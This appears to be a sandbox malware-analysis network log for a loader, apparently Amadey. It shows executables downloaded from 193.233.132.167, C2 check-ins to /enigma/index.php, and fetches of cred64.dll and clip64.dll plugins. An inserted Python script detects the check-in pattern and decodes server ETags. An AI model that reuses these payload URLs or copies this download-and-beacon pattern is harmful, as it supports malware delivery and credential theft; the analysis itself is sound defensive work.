                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/cost/sarra.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /cost/sarra.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:32 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 2374144
                                        Last-Modified: Sat, 27 Apr 2024 15:51:14 GMT
                                        Connection: keep-alive
                                        ETag: "662d1ef2-243a00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/mine/amert.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /mine/amert.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:34 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1895424
                                        Last-Modified: Sat, 27 Apr 2024 15:51:47 GMT
                                        Connection: keep-alive
                                        ETag: "662d1f13-1cec00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/mine/random.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /mine/random.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:36 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1166336
                                        Last-Modified: Sat, 27 Apr 2024 15:50:45 GMT
                                        Connection: keep-alive
                                        ETag: "662d1ed5-11cc00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/cost/random.exe
                                        explorta.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /cost/random.exe HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:07:38 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 2413056
                                        Last-Modified: Sat, 27 Apr 2024 15:50:59 GMT
                                        Connection: keep-alive
                                        ETag: "662d1ee3-24d200"
                                        Accept-Ranges: bytes
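                                        The check-in and payload-download transactions above can be triaged mechanically. The Python below is an added example, not part of the sandbox report and not Amadey's own code: it embeds records constructed from the header blocks shown above (request and response bodies were not captured), flags the C2 check-in pattern seen here (a form POST to .../index.php on a literal-IP host, a body of a few dozen bytes, no User-Agent), and decodes nginx's hex(mtime)-hex(size) ETag to confirm that each payload's ETag agrees with the Last-Modified and Content-Length the server sent. The 512-byte body threshold and all function names are my own choices.

```python
import ipaddress
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Records constructed from the transactions listed above; the sandbox did
# not capture bodies, so only the header blocks are reproduced.
CHECKIN_REQUEST = """POST /sev56rkm/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.139
Content-Length: 31
Cache-Control: no-cache"""

# Benign control: the chrome.exe navigation from the same capture.
BROWSER_REQUEST = """GET /account HTTP/2.0
host: www.youtube.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
accept: text/html"""

# The four payload downloads, reduced to the headers the ETag check needs.
PAYLOAD_RESPONSES = {
    "http://193.233.132.167/cost/sarra.exe":
        'HTTP/1.1 200 OK\nContent-Length: 2374144\n'
        'Last-Modified: Sat, 27 Apr 2024 15:51:14 GMT\nETag: "662d1ef2-243a00"',
    "http://193.233.132.167/mine/amert.exe":
        'HTTP/1.1 200 OK\nContent-Length: 1895424\n'
        'Last-Modified: Sat, 27 Apr 2024 15:51:47 GMT\nETag: "662d1f13-1cec00"',
    "http://193.233.132.167/mine/random.exe":
        'HTTP/1.1 200 OK\nContent-Length: 1166336\n'
        'Last-Modified: Sat, 27 Apr 2024 15:50:45 GMT\nETag: "662d1ed5-11cc00"',
    "http://193.233.132.167/cost/random.exe":
        'HTTP/1.1 200 OK\nContent-Length: 2413056\n'
        'Last-Modified: Sat, 27 Apr 2024 15:50:59 GMT\nETag: "662d1ee3-24d200"',
}

NGINX_ETAG = re.compile(r'^(?:W/)?"([0-9a-f]+)-([0-9a-f]+)"$')


def parse_http_headers(raw: str) -> tuple:
    """Split a captured head into (start line, dict of lower-cased header names)."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def is_bare_ip_host(host: str) -> bool:
    """True when the Host header is a literal IP rather than a name."""
    try:
        ipaddress.ip_address(host.split(":")[0])
        return True
    except ValueError:
        return False


def is_amadey_checkin(raw_request: str, max_body: int = 512) -> bool:
    """Heuristic derived from the capture: form POST to /index.php, Host is a
    literal IP, tiny body, and no User-Agent at all (browsers always send one)."""
    start, h = parse_http_headers(raw_request)
    method, path, _ = start.split(" ", 2)
    return bool(
        method == "POST"
        and path.endswith("/index.php")
        and h.get("content-type", "").startswith("application/x-www-form-urlencoded")
        and is_bare_ip_host(h.get("host", ""))
        and int(h.get("content-length", "0")) <= max_body
        and "user-agent" not in h
    )


def decode_nginx_etag(etag: str) -> tuple:
    """nginx builds its ETag as hex(mtime)-hex(size); return (UTC mtime, size)."""
    m = NGINX_ETAG.match(etag.strip())
    if not m:
        raise ValueError(f"not an nginx-style ETag: {etag!r}")
    mtime = datetime.fromtimestamp(int(m.group(1), 16), tz=timezone.utc)
    return mtime, int(m.group(2), 16)


def payload_etag_consistent(raw_response: str) -> bool:
    """True when the ETag agrees with Last-Modified and Content-Length."""
    _, h = parse_http_headers(raw_response)
    mtime, size = decode_nginx_etag(h["etag"])
    return mtime == parsedate_to_datetime(h["last-modified"]) and size == int(h["content-length"])


def triage() -> dict:
    """Per payload URL: does the server's ETag match what it claims elsewhere?"""
    return {url: payload_etag_consistent(raw) for url, raw in PAYLOAD_RESPONSES.items()}


if __name__ == "__main__":
    print("C2 check-in pattern:", is_amadey_checkin(CHECKIN_REQUEST))
    print("Browser request flagged:", is_amadey_checkin(BROWSER_REQUEST))
    for url, raw in PAYLOAD_RESPONSES.items():
        _, h = parse_http_headers(raw)
        staged, size = decode_nginx_etag(h["etag"])
        print(f"{url}: staged {staged:%Y-%m-%d %H:%M:%S}Z, {size} bytes, "
              f"etag consistent={payload_etag_consistent(raw)}")
```

The decoded ETags are a useful staging timeline: all four payloads were written to the 193.233.132.167 host between 15:50:45 and 15:51:47 UTC, roughly 76 minutes before this run fetched them, and every decoded size equals the Content-Length, so the downloads were complete files rather than truncated transfers. The first check-in's response also carries `Refresh: 0; url = Login.php`, meaning the same PHP endpoint doubles as the panel login page; that header is a reasonable extra server-side fingerprint when hunting for sibling C2 hosts.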
                                      • flag-us
                                        DNS
                                        139.132.233.193.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        139.132.233.193.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        167.132.233.193.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        167.132.233.193.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        www.youtube.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        www.youtube.com
                                        IN A
                                        Response
                                        www.youtube.com
                                        IN CNAME
                                        youtube-ui.l.google.com
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.179.238
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.180.14
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.187.206
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.187.238
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.178.14
                                        youtube-ui.l.google.com
                                        IN A
                                        172.217.16.238
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.200.14
                                        youtube-ui.l.google.com
                                        IN A
                                        142.250.200.46
                                        youtube-ui.l.google.com
                                        IN A
                                        216.58.201.110
                                        youtube-ui.l.google.com
                                        IN A
                                        216.58.204.78
                                        youtube-ui.l.google.com
                                        IN A
                                        216.58.212.206
                                      • flag-gb
                                        GET
                                        https://www.youtube.com/account
                                        chrome.exe
                                        Remote address:
                                        142.250.179.238:443
                                        Request
                                        GET /account HTTP/2.0
                                        host: www.youtube.com
                                        sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        upgrade-insecure-requests: 1
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-wow64: ?0
                                        sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                                        x-client-data: CJHdygE=
                                        sec-fetch-site: none
                                        sec-fetch-mode: navigate
                                        sec-fetch-user: ?1
                                        sec-fetch-dest: document
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        accounts.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        accounts.google.com
                                        IN A
                                        Response
                                        accounts.google.com
                                        IN A
                                        173.194.69.84
                                      • flag-us
                                        DNS
                                        195.187.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        195.187.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        195.187.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s33-in-f3.1e100.net
                                      • flag-us
                                        DNS
                                        234.187.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        234.187.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        234.187.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s34-in-f10.1e100.net
                                      • flag-us
                                        DNS
                                        238.179.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        238.179.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        238.179.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s31-in-f14.1e100.net
                                      • flag-us
                                        DNS
                                        content-autofill.googleapis.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        content-autofill.googleapis.com
                                        IN A
                                        Response
                                        content-autofill.googleapis.com
                                        IN A
                                        172.217.16.234
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.200.10
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.200.42
                                        content-autofill.googleapis.com
                                        IN A
                                        216.58.201.106
                                        content-autofill.googleapis.com
                                        IN A
                                        216.58.204.74
                                        content-autofill.googleapis.com
                                        IN A
                                        216.58.212.202
                                        content-autofill.googleapis.com
                                        IN A
                                        172.217.169.74
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.179.234
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.180.10
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.187.202
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.187.234
                                        content-autofill.googleapis.com
                                        IN A
                                        142.250.178.10
                                      • flag-gb
                                        GET
                                        https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto
                                        chrome.exe
                                        Remote address:
                                        172.217.16.234:443
                                        Request
                                        GET /v1/pages/ChVDaHJvbWUvMTEwLjAuNTQ4MS4xMDQSHgmA6QC9dWevzxIFDRkBE_oSBQ3oIX6GEgUN05ioBw==?alt=proto HTTP/2.0
                                        host: content-autofill.googleapis.com
                                        x-goog-encode-response-if-executable: base64
                                        x-goog-api-key: AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                        x-client-data: CJHdygE=
                                        sec-fetch-site: none
                                        sec-fetch-mode: no-cors
                                        sec-fetch-dest: empty
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        accounts.youtube.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        accounts.youtube.com
                                        IN A
                                        Response
                                        accounts.youtube.com
                                        IN CNAME
                                        www3.l.google.com
                                        www3.l.google.com
                                        IN A
                                        172.217.16.238
                                      • flag-us
                                        DNS
                                        84.69.194.173.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        84.69.194.173.in-addr.arpa
                                        IN PTR
                                        Response
                                        84.69.194.173.in-addr.arpa
                                        IN PTR
                                        ef-in-f84.1e100.net
                                      • flag-us
                                        DNS
                                        3.180.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        3.180.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        3.180.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s32-in-f3.1e100.net
                                      • flag-us
                                        DNS
                                        227.212.58.216.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        Response
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        lhr25s28-in-f3.1e100.net
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        ams16s22-in-f3.1e100.net
                                        227.212.58.216.in-addr.arpa
                                        IN PTR
                                        ams16s22-in-f227.1e100.net
                                      • flag-us
                                        DNS
                                        234.16.217.172.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        234.16.217.172.in-addr.arpa
                                        IN PTR
                                        Response
                                        234.16.217.172.in-addr.arpa
                                        IN PTR
                                        lhr48s28-in-f10.1e100.net
                                        234.16.217.172.in-addr.arpa
                                        IN PTR
                                        mad08s04-in-f10.1e100.net
                                      • flag-gb
                                        GET
                                        https://accounts.youtube.com/accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684
                                        chrome.exe
                                        Remote address:
                                        172.217.16.238:443
                                        Request
                                        GET /accounts/CheckConnection?pmpo=https%3A%2F%2Faccounts.google.com&v=1201792650&timestamp=1714237659684 HTTP/2.0
                                        host: accounts.youtube.com
                                        sec-ch-ua: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-full-version: "110.0.5481.104"
                                        sec-ch-ua-arch: "x86"
                                        sec-ch-ua-platform: "Windows"
                                        sec-ch-ua-platform-version: "10.0.0"
                                        sec-ch-ua-model: ""
                                        sec-ch-ua-bitness: "64"
                                        sec-ch-ua-wow64: ?0
                                        sec-ch-ua-full-version-list: "Chromium";v="110.0.5481.104", "Not A(Brand";v="24.0.0.0", "Google Chrome";v="110.0.5481.104"
                                        upgrade-insecure-requests: 1
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        x-client-data: CJHdygE=
                                        sec-fetch-site: cross-site
                                        sec-fetch-mode: navigate
                                        sec-fetch-dest: iframe
                                        referer: https://accounts.google.com/
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                        cookie: YSC=YS5PzM7dWFk
                                        cookie: VISITOR_INFO1_LIVE=dZ-UnFWGjCk
                                        cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgLQ%3D%3D
                                      • flag-gb
                                        GET
                                        https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1
                                        chrome.exe
                                        Remote address:
                                        172.217.16.238:443
                                        Request
                                        GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=110.0.5481.104&lang=en-US&acceptformat=crx3&x=id%3Dghbmnnjooekpmoecnnnilnnbdlolhkhi%26v%3D1.76.1%26installsource%3Dnotfromwebstore%26installedby%3Dexternal%26uc%26ping%3Dr%253D1%2526e%253D1&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D1.0.0.6%26installsource%3Dnotfromwebstore%26installedby%3Dother%26uc%26ping%3Dr%253D1%2526e%253D1 HTTP/2.0
                                        host: clients2.google.com
                                        sec-fetch-site: none
                                        sec-fetch-mode: no-cors
                                        sec-fetch-dest: empty
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        www.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        www.google.com
                                        IN A
                                        Response
                                        www.google.com
                                        IN A
                                        142.250.178.4
                                      • flag-us
                                        DNS
                                        238.16.217.172.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        238.16.217.172.in-addr.arpa
                                        IN PTR
                                        Response
                                        238.16.217.172.in-addr.arpa
                                        IN PTR
                                        lhr48s28-in-f14.1e100.net
                                        238.16.217.172.in-addr.arpa
                                        IN PTR
                                        mad08s04-in-f14.1e100.net
                                      • flag-us
                                        DNS
                                        4.178.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        4.178.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        4.178.250.142.in-addr.arpa
                                        IN PTR
                                        lhr48s27-in-f4.1e100.net
                                      • flag-us
                                        DNS
                                        clients2.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        clients2.google.com
                                        IN A
                                        Response
                                        clients2.google.com
                                        IN CNAME
                                        clients.l.google.com
                                        clients.l.google.com
                                        IN A
                                        172.217.16.238
                                      • flag-us
                                        DNS
                                        play.google.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        play.google.com
                                        IN A
                                        Response
                                        play.google.com
                                        IN A
                                        142.250.187.206
                                      • flag-gb
                                        OPTIONS
                                        https://play.google.com/log?format=json&hasfast=true&authuser=0
                                        chrome.exe
                                        Remote address:
                                        142.250.187.206:443
                                        Request
                                        OPTIONS /log?format=json&hasfast=true&authuser=0 HTTP/2.0
                                        host: play.google.com
                                        accept: */*
                                        access-control-request-method: POST
                                        access-control-request-headers: x-goog-authuser
                                        origin: https://accounts.google.com
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        sec-fetch-mode: cors
                                        sec-fetch-site: same-site
                                        sec-fetch-dest: empty
                                        referer: https://accounts.google.com/
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        206.187.250.142.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        206.187.250.142.in-addr.arpa
                                        IN PTR
                                        Response
                                        206.187.250.142.in-addr.arpa
                                        IN PTR
                                        lhr25s33-in-f14.1e100.net
                                      • flag-us
                                        DNS
                                        86.23.85.13.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        86.23.85.13.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-us
                                        DNS
                                        56.126.166.20.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        56.126.166.20.in-addr.arpa
                                        IN PTR
                                        Response
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 4
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 158
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:02 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/enigma/Plugins/cred64.dll
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /enigma/Plugins/cred64.dll HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:12 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 1285632
                                        Last-Modified: Thu, 01 Feb 2024 16:00:36 GMT
                                        Connection: keep-alive
                                        ETag: "65bbc024-139e00"
                                        Accept-Ranges: bytes
                                      • flag-ru
                                        GET
                                        http://193.233.132.167/enigma/Plugins/clip64.dll
                                        chrosha.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        GET /enigma/Plugins/clip64.dll HTTP/1.1
                                        Host: 193.233.132.167
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:23 GMT
                                        Content-Type: application/octet-stream
                                        Content-Length: 112128
                                        Last-Modified: Thu, 01 Feb 2024 16:00:35 GMT
                                        Connection: keep-alive
                                        ETag: "65bbc023-1b600"
                                        Accept-Ranges: bytes
                                      • flag-us
                                        DNS
                                        17.14.97.104.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        17.14.97.104.in-addr.arpa
                                        IN PTR
                                        Response
                                        17.14.97.104.in-addr.arpa
                                        IN PTR
                                        a104-97-14-17.deploy.static.akamaitechnologies.com
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        rundll32.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 21
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:14 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        Refresh: 0; url = Login.php
                                      • flag-ru
                                        POST
                                        http://193.233.132.167/enigma/index.php
                                        rundll32.exe
                                        Remote address:
                                        193.233.132.167:80
                                        Request
                                        POST /enigma/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 193.233.132.167
                                        Content-Length: 5
                                        Cache-Control: no-cache
                                        Response
                                        HTTP/1.1 200 OK
                                        Server: nginx/1.18.0 (Ubuntu)
                                        Date: Sat, 27 Apr 2024 17:08:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                      • flag-us
                                        DNS
                                        249.197.17.2.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        249.197.17.2.in-addr.arpa
                                        IN PTR
                                        Response
                                        249.197.17.2.in-addr.arpa
                                        IN PTR
                                        a2-17-197-249.deploy.static.akamaitechnologies.com
                                      • flag-us
                                        DNS
                                        beacons.gcp.gvt2.com
                                        chrome.exe
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        beacons.gcp.gvt2.com
                                        IN A
                                        Response
                                        beacons.gcp.gvt2.com
                                        IN CNAME
                                        beacons-handoff.gcp.gvt2.com
                                        beacons-handoff.gcp.gvt2.com
                                        IN A
                                        192.178.49.163
                                      • flag-us
                                        POST
                                        https://beacons.gcp.gvt2.com/domainreliability/upload
                                        chrome.exe
                                        Remote address:
                                        192.178.49.163:443
                                        Request
                                        POST /domainreliability/upload HTTP/2.0
                                        host: beacons.gcp.gvt2.com
                                        content-length: 300
                                        content-type: application/json; charset=utf-8
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                        Response
                                        HTTP/2.0 200
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        date: Sat, 27 Apr 2024 17:09:43 GMT
                                        content-type: text/html
                                        content-type: text/html
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        content-type: text/html
                                      • flag-us
                                        OPTIONS
                                        https://beacons.gcp.gvt2.com/domainreliability/upload-nel
                                        chrome.exe
                                        Remote address:
                                        192.178.49.163:443
                                        Request
                                        OPTIONS /domainreliability/upload-nel HTTP/2.0
                                        host: beacons.gcp.gvt2.com
                                        origin: https://accounts.google.com
                                        access-control-request-method: POST
                                        access-control-request-headers: content-type
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                        Response
                                        HTTP/2.0 200
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        date: Sat, 27 Apr 2024 17:09:43 GMT
                                        content-type: text/html
                                        content-type: text/html
                                        access-control-allow-headers: Content-Type
                                        access-control-allow-methods: POST
                                        access-control-allow-origin: *
                                        content-type: text/html
                                      • flag-us
                                        POST
                                        https://beacons.gcp.gvt2.com/domainreliability/upload-nel
                                        chrome.exe
                                        Remote address:
                                        192.178.49.163:443
                                        Request
                                        POST /domainreliability/upload-nel HTTP/2.0
                                        host: beacons.gcp.gvt2.com
                                        content-length: 405
                                        content-type: application/reports+json
                                        user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
                                        accept-encoding: gzip, deflate, br
                                        accept-language: en-US,en;q=0.9
                                      • flag-us
                                        DNS
                                        163.49.178.192.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        163.49.178.192.in-addr.arpa
                                        IN PTR
                                        Response
                                        163.49.178.192.in-addr.arpa
                                        IN PTR
                                        phx19s05-in-f3.1e100.net
                                      • flag-us
                                        DNS
                                        48.229.111.52.in-addr.arpa
                                        Remote address:
                                        8.8.8.8:53
                                        Request
                                        48.229.111.52.in-addr.arpa
                                        IN PTR
                                        Response
                                      • 204.79.197.237:443
                                        https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8DEiB3BpqH80lQh3h0OFLSTVUCUyVIwR3suggEvtxpKmgPP_bHpttlnvEz61mrVmr1xSwB0-b5US2mU9qDwBonDPEu9q2_1jXrkqdtEGpIX6v8P-8cmDswVn0v6l1XjkZvLXozNK4LKciaAPuaY3neL6kwH5awU2eF1xRwzy2WLBNgzPx%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D03f3332a0a201c1abc345501a3f8558e&TIME=20240426T131952Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:465F5D2A-B062-9966-D2D4-950980DD8E0E&deviceId=6966564702272893&muid=465F5D2AB0629966D2D4950980DD8E0E
                                        tls, http2
                                        2.5kB
                                        9.0kB
                                        20
                                        17

                                        HTTP Request

